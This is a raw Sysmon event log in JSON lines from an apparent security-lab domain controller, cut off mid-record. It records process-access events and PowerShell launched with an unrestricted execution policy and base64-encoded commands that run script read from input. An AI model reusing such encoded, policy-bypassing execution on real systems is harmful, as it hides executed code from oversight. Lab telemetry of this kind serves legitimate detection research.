{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4348,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.889\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-00108D560600}\r\nTargetProcessId: 4504\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.889","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-00108D560600}","TargetProcessId":"4504","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4349,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.956\r\nProcessGuid: {A837DB8D-030D-5F25-0000-001067620600}\r\nProcessId: 2968\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-030D-5F25-0000-0020B5520600}\r\nLogonId: 0x652B5\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-030D-5F25-0000-00108D560600}\r\nParentProcessId: 4504\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.956","ProcessGuid":"{A837DB8D-030D-5F25-0000-001067620600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-030D-5F25-0000-0020B5520600}","LogonId":"0x652b5","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-030D-5F25-0000-00108D560600}","ParentProcessId":"4504","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4350,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00108D560600}\r\nSourceProcessId: 4504\r\nSourceThreadId: 4984\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-001067620600}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98252ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976b4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97712ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f61dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976e8161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976daae2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976da0b2(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00108D560600}","SourceProcessId":"4504","SourceThreadId":"4984","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-001067620600}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98252ed6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+981a5096(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976b4817(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97712ce6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f634b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f61dc(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976e8161(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4694(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f4287(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3fb0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+976f3c81(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.d